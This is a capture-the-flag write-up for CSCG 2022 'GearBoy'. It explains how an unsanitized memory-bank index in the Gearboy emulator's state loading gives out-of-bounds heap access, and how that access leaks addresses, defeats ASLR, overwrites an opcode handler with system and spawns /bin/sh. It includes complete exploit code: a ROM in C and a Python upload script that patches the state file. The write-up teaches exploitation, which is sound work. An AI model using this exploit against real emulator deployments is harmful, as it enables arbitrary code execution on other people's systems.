CSCG 2022 - GearBoy
Challenge
Straightforward task: exploit the Gearboy emulator.
Overview
The task is to read the contents of the flag file by crafting a ROM and a state file that will be run on the target server by a modified, headless version of Gearboy, a Game Boy emulator.
Analysis
My first suspicion was missing checks in the handling of the state file rather than the ROM: a state can be saved and loaded at any point in time, while the ROM only needs to be validated once, on initial load. Restoring a state therefore requires more checks, any of which could be broken or forgotten entirely.
Inspecting the source code of GearboyCore::LoadState, we find the emulator's functionality split across many classes, each with its own LoadState, e.g. Processor::LoadState and Memory::LoadState.
Memory::LoadState loads (among other things) the various memory bank buffers as well as the values that control which banks are selected. Since the address space of the Game Boy is limited to 16 bits, parts of memory have to be swapped in and out to make more space accessible. Hence the concept of memory bank switching.
Often an index indicates which memory bank is in use, as is the case with WRAM1:
u8* Memory::GetWRAM1()
{
    return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
As long as m_bCGB (a flag for Game Boy Color mode) is set, the backing buffer of WRAM1 is chosen from a bank in m_pWRAMBanks.
The value of m_bCGB is controlled by special-purpose bytes in the ROM, which we control.
Since m_iCurrentWRAMBank is loaded as part of the state and its value is not properly sanitized, modifying it in the state file essentially lets us mmap an arbitrary piece of memory into the address space of our emulated game. When the running ROM reads from or writes to 0xD000-0xE000, it instead accesses the address we control.
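The effect of an unchecked bank index can be sketched with a small model of the pointer arithmetic in the CGB branch of GetWRAM1. This is only an illustration: the function name and the heap address below are hypothetical, and only the 0x1000 multiplier is taken from the emulator source.

```python
BANK_SIZE = 0x1000  # bytes per WRAM bank, from the 0x1000 multiplier in GetWRAM1


def wram1_host_address(wram_banks: int, current_bank: int) -> int:
    """Host address backing emulated 0xD000 (models the CGB branch of GetWRAM1)."""
    return wram_banks + BANK_SIZE * current_bank


wram_banks = 0x555500020000  # hypothetical heap address of m_pWRAMBanks

# An in-range index stays inside the bank buffer ...
assert wram1_host_address(wram_banks, 1) == wram_banks + 0x1000

# ... while a negative index taken from the state file lands before it.
distance = wram_banks - wram1_host_address(wram_banks, -0x13)
print(hex(distance))  # 0x13000
```

Nothing in this arithmetic bounds the index, which is why a value from the state file is enough to move the window.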
But where to write when ASLR is enabled?
To get around ASLR we need to find objects on the heap at consistent offsets from the WRAM bank buffer m_pWRAMBanks. We can do this by running gdbserver in the Docker container and observing the surrounding memory and the pointers of objects allocated shortly before or after it. The fact that each session is a freshly spawned Docker container helps with consistency.
Doing this, we find a heap layout that is consistent on every first run in the Docker container: the Processor object is at an offset of -0x126a0 from m_pWRAMBanks, and the Memory object is at an offset of -0xd0 from the Processor object, i.e. -0x12770 from m_pWRAMBanks. By setting m_iCurrentWRAMBank to -0x13 in the state file, the window at 0xD000 starts 0x13000 bytes before m_pWRAMBanks, so we can access the Processor object at 0x13000-0x126a0+0xD000=0xD960 and the Memory object at 0x13000-0x12770+0xD000=0xD890.
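The address arithmetic can be double-checked with a few lines of Python. This is a sketch using only the offsets observed in the debugger; the helper name is mine, and the Memory offset is derived as the Processor offset minus 0xd0.

```python
WINDOW_START = 0xD000  # emulated address where WRAM1 begins
BANK_SIZE = 0x1000     # size of the WRAM1 window


def gb_address(offset_from_wram_banks: int, bank: int) -> int:
    """Emulated address at which a host object shows up for a given bank index.

    offset_from_wram_banks is the object's host address minus m_pWRAMBanks.
    """
    window_offset = BANK_SIZE * bank  # window start relative to m_pWRAMBanks
    addr = WINDOW_START + (offset_from_wram_banks - window_offset)
    if not WINDOW_START <= addr < WINDOW_START + BANK_SIZE:
        raise ValueError("object starts outside the 0x1000-byte window")
    return addr


PROCESSOR_OFFSET = -0x126a0
MEMORY_OFFSET = PROCESSOR_OFFSET - 0xd0  # -0x12770

print(hex(gb_address(PROCESSOR_OFFSET, -0x13)))  # 0xd960
print(hex(gb_address(MEMORY_OFFSET, -0x13)))     # 0xd890
```

The range check also shows why -0x13 is the bank to pick: with any other index, both objects would start outside the window.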
For every instruction, the processor resolves the handler function for an opcode by looking it up in a table, using the opcode as the index. This opcodeTable is a member of the Processor object and as such is stored on the heap. By reading one of these function pointers and subtracting its offset within the binary, we can recover the base address at which the Gearboy emulator is loaded.
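As a sketch of this step, the snippet below recovers the load base from a leaked table entry. The offset 0x1d420 is the one used in rom.c for the opcode 0x00 handler; the function name and the leaked value are made up, and the page-alignment check is just a sanity test I would add, not something the exploit itself performs.

```python
import struct

HANDLER_OFFSET = 0x1d420  # offset of the opcode 0x00 handler in the binary (from rom.c)


def image_base(leaked_entry: bytes) -> int:
    """Recover the load base from the first 8 bytes of opcodeTable[0]."""
    (handler,) = struct.unpack("<Q", leaked_entry[:8])
    base = handler - HANDLER_OFFSET
    if base & 0xfff:
        raise ValueError("base is not page-aligned; wrong offset or bad leak")
    return base


# Hypothetical leak: a PIE binary loaded at 0x555555554000.
leak = struct.pack("<Q", 0x555555554000 + HANDLER_OFFSET)
print(hex(image_base(leak)))  # 0x555555554000
```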
Now that we know the base address, and with it the address of the GOT, the usual next step would be to leak libc by reading the GOT, calculate the address of system, and overwrite a function pointer to call it. The only problem is that we are still just a ROM in an emulator and only have access to the memory mapped into 0xD000-0xE000.
We need to look for another access primitive.
This time, however, we are not limited to the contents of our state and ROM files: we can manipulate the Memory and Processor objects directly!
Looking through the source code again we find a good candidate:
u8* Memory::GetVRAM()
{
    if (m_bCGB)
        return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
    else
        return m_pMap + 0x8000;
}
We have already set m_bCGB, and m_iCurrentLCDRAMBank is loaded from the state file. As such, we can make accesses to 0x8000-0x9000 be backed by the m_pLCDRAMBank1 buffer, whose pointer we control.
We set m_pLCDRAMBank1 in the Memory object to point to the GOT entry of free, whose address we calculate from the base address. We can then read the address of free from 0x8000, derive the libc base from it, and calculate the address of system.
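The chain from base address to system is plain offset arithmetic, sketched below. The three offsets are the ones hard-coded in rom.c and are specific to the target binary and libc; the function names and the example libc base are hypothetical.

```python
FREE_GOT_OFFSET = 0x4ad78  # GOT slot of free, relative to the emulator base (from rom.c)
FREE_OFFSET = 0x9a6d0      # free, relative to the libc base (from rom.c)
SYSTEM_OFFSET = 0x52290    # system, relative to the libc base (from rom.c)


def free_got_address(base: int) -> int:
    """Address to store in m_pLCDRAMBank1 so that 0x8000 maps onto the GOT slot."""
    return base + FREE_GOT_OFFSET


def system_address(free_address: int) -> int:
    """Derive the address of system from the leaked address of free."""
    libc_base = free_address - FREE_OFFSET
    return libc_base + SYSTEM_OFFSET


# Hypothetical run: libc mapped at 0x7ffff7c00000.
leaked_free = 0x7ffff7c00000 + FREE_OFFSET
print(hex(system_address(leaked_free)))  # 0x7ffff7c52290
```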
To finally call system, we overwrite a function pointer in Processor::opcodeTable and execute the corresponding opcode.
We ensure that the first argument to system points to the string /bin/sh by writing it to the address of the Processor object, as this is the address in rdi when system is called. Since opcodeTable is the first member of Processor, we need to choose an opcode whose table entry does not overlap the space used for the string and which is not executed before the pointer has been fully written (as would be the case with the load instructions). The stop instruction (opcode 0x10) is a good fit here.
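To see which table entries the string overlaps, here is a small sketch. It assumes each opcodeTable entry is 0x10 bytes wide, which I infer from the 0x10*0x10 offset used for stop in rom.c rather than from the emulator source; the helper names are hypothetical.

```python
ENTRY_SIZE = 0x10           # assumed bytes per opcodeTable entry (inferred from rom.c)
COMMAND = b"/bin/sh\x00"    # string written at the start of the Processor object


def entry_offset(opcode: int) -> int:
    """Byte offset of an opcode's table entry from the start of the Processor object."""
    return opcode * ENTRY_SIZE


def clobbered_opcodes(payload_len: int) -> list[int]:
    """Opcodes whose table entry overlaps a payload written at offset 0."""
    return [op for op in range(0x100) if entry_offset(op) < payload_len]


print(clobbered_opcodes(len(COMMAND)))  # [0]
print(hex(entry_offset(0x10)))          # 0x100
```

Under that assumption only the entry for opcode 0x00 is overwritten by the string, and the entry for stop sits well clear of it at offset 0x100.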
Exploit
The ROM code was compiled using GBDK.
rom.c
#include <stdint.h>
#include <string.h>

void
main(void)
{
    volatile static uint8_t *processor_gb;
    volatile static uint8_t *memory_gb;
    volatile static uint8_t *free_got_gb;
    volatile static uint64_t op0x00;
    volatile static uint64_t base;
    volatile static uint64_t libc;
    volatile static uint64_t free_got;
    volatile static uint64_t target;

    /* WRAM BANK = -0x13 */
    processor_gb = (void*) 0xD960;
    memory_gb = processor_gb - 0xd0;

    /* get base from op0x00 */
    op0x00 = *(uint64_t*)processor_gb;
    base = op0x00 - 0x1d420;
    free_got = base + 0x4ad78;

    /* change lcdrambank pointer to access got */
    *(uint64_t*)(memory_gb+0x90) = free_got;
    free_got_gb = (void*) 0x8000;

    /* leak free from the got, then derive system */
    libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
    target = libc + 0x52290;

    /* "/bin/sh" goes to the start of Processor, system into the stop entry */
    strcpy((char*)processor_gb, "/bin/sh");
    *(uint64_t*)(processor_gb+0x10*0x10) = target;

    /* execute stop (opcode 0x10) to trigger the overwritten handler */
    __asm \
    stop \
    __endasm;

    while (1);
}
upload.py
import struct
from base64 import b64encode
from sys import argv

from pwn import *

rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())

# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("<i", -0x13)):
    state[0x10000+i] = v

# set m_iCurrentLCDRAMBank
for i,v in enumerate(struct.pack("<i", 1)):
    state[0x10004+i] = v

# send the ROM and the patched state, base64-encoded, one per line
io = process(argv[1:])
io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))
io.interactive()
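The two patches can be checked offline before uploading. The sketch below uses a hypothetical helper, patch_i32, and a zero-filled stand-in buffer instead of a real main.state; the offsets 0x10000 and 0x10004 are the ones used in upload.py.

```python
import struct


def patch_i32(state: bytearray, offset: int, value: int) -> None:
    """Overwrite four bytes at offset with a little-endian signed 32-bit value."""
    state[offset:offset + 4] = struct.pack("<i", value)


state = bytearray(0x10008)        # zero-filled stand-in for main.state
patch_i32(state, 0x10000, -0x13)  # m_iCurrentWRAMBank
patch_i32(state, 0x10004, 1)      # m_iCurrentLCDRAMBank

print(state[0x10000:0x10008].hex())  # edffffff01000000
```

Using a bytearray with slice assignment avoids the list round trip, and the hex dump makes it easy to confirm that the negative bank index is stored in two's complement.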